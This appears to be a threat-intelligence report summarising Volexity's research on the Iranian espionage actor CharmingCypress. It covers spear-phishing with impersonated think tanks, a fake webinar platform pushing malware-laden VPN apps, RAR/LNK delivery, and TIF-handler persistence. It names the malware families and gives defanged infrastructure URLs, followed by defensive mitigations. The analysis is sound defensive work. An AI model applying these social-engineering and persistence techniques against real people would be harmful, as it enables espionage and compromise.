Full Report
Through its managed security services offerings, Volexity routinely identifies spear-phishing campaigns targeting its customers. One persistent threat actor, whose campaigns Volexity frequently observes, is the Iranian-origin threat actor CharmingCypress (aka Charming Kitten, APT42, TA453). Volexity assesses that CharmingCypress is tasked with collecting political intelligence against foreign targets, particularly focusing on think tanks, NGOs, and journalists. In their phishing campaigns, CharmingCypress often employs unusual social-engineering tactics, such as engaging targets in prolonged conversations over email before sending links to malicious content. In a particularly notable spear-phishing campaign observed by Volexity, CharmingCypress went so far as to craft an entirely fake webinar platform to use as part of the lure. CharmingCypress controlled access to this platform, requiring targets to install malware-laden VPN applications prior to granting access. Note: Some content in this blog was recently discussed in Microsoft’s report, New TTPs observed in Mint Sandstorm campaign targeting high-profile individuals at universities and […] The post CharmingCypress: Innovating Persistence appeared first on Volexity.
Analysis Summary
# Threat Actor: CharmingCypress
## Attribution & Identity
* **Origin:** Iranian-origin threat actor.
* **Known Aliases/Associated Groups:** Charming Kitten, APT42, TA453.
* **Assessment:** Tasks involve collecting political intelligence against foreign targets.
## Activity Summary
CharmingCypress conducts persistent, high-effort spear-phishing campaigns, frequently observed by Volexity throughout 2023 and into early 2024. They engage targets in prolonged email conversations before delivering malicious content. A notable campaign involved impersonating the Rasanah International Institute for Iranian Studies (IIIS) using typo-squatted domains (e.g., similar to rasanah-iiis[.]org) and crafting a fake webinar platform to coerce targets into installing malware-laden VPN applications. This actor is highly committed to surveillance and adapting techniques to compromise specific targets.
## Tactics, Techniques & Procedures
- **Spear Phishing:** Used extensively, often involving spoofing individuals from legitimate organizations (media, research institutions). Demonstrates "Multi-Persona Impersonation" using multiple actor-controlled email accounts in the same chain.
- **Social Engineering:** Engaging targets in long conversations before delivering links. Impersonating organizations to establish a viable pretext for contact.
- **Delivery Mechanism:** Use of RAR archives containing malicious shortcut (LNK) files.
- **Initial Access:** Redirection chains culminating in the download of password-protected RAR archives hosted on legitimate file-sharing services (e.g., Supabase).
- **Obfuscation:** Use of string-replacement to obfuscate commands within LNK files.
- **Persistence/Backup C2:** Setting malware (EYEGLASS) as the default handler for TIF (Tagged Image File Format) files, intended to regain access if primary C2 is lost by sending the victim a specially crafted TIF file.
- **Impersonation Lures:** LNK files were named after recent articles from credible sources (e.g., Atlantic Council) to appear relevant to policy experts.
## Targeting
* **Sectors:** Think tanks, NGOs, journalists, academics, and policy experts.
* **Geography:** Foreign targets (implied by the nature of political intelligence collection).
* **Victims:** Individuals affiliated with research/academic organizations and policy experts.
## Tools & Infrastructure
* **Malware Families Used:**
* POWERSTAR (aka GorjolEcho)
* NOKNOK
* POWERLESS (New observation in recent campaigns)
* BASICSTAR (Appears to be new Visual Basic malware)
* EYEGLASS (Documented as MediaPl backdoor)
* **Data Theft Tools:** Nirsoft Chrome History Viewer, RATHOLE, SNAILPROXY, CommandCam.
* **Infrastructure:**
* C2/Delivery URLs observed using: `hxxps://cloud-document-edit.onrender[.]com/`
* File Hosting for RAR archives observed on: `hxxps://wulpfsrqupnuqorhexiw.supabase[.]co/`
* Use of WhatsApp and Signal phone numbers for deceptive communication.
* **Other Artifacts:** Command-line copies of WinRAR and 7-Zip were identified on compromise systems.
## Implications
CharmingCypress represents a highly persistent, well-resourced, and adaptive threat actor dedicated to long-term political intelligence gathering. Their willingness to invest significant effort into complex social engineering (like custom webinar platforms) and continuously refresh their malware toolkit (introducing BASICSTAR and utilizing POWERLESS) indicates a mature capability that warrants proactive defense tailoring against spear-phishing lures.
## Mitigations
- Exercise extreme caution with unsolicited emails, especially when they involve engagement in prolonged discussions before delivering attachments or links.
- Be wary of lures impersonating known, legitimate organizations, especially regarding academic or political collaboration (e.g., fake webinars).
- Implement robust endpoint detection and response to monitor for suspicious execution chains involving RAR/LNK files.
- Harden endpoints against execution from unusual file types, such as monitoring for unexpected execution attempts via TIF file associations.
- Enhance network monitoring for command-and-control beaconing associated with the observed malware families (POWERSTAR, NOKNOK, POWERLESS, BASICSTAR, EYEGLASS).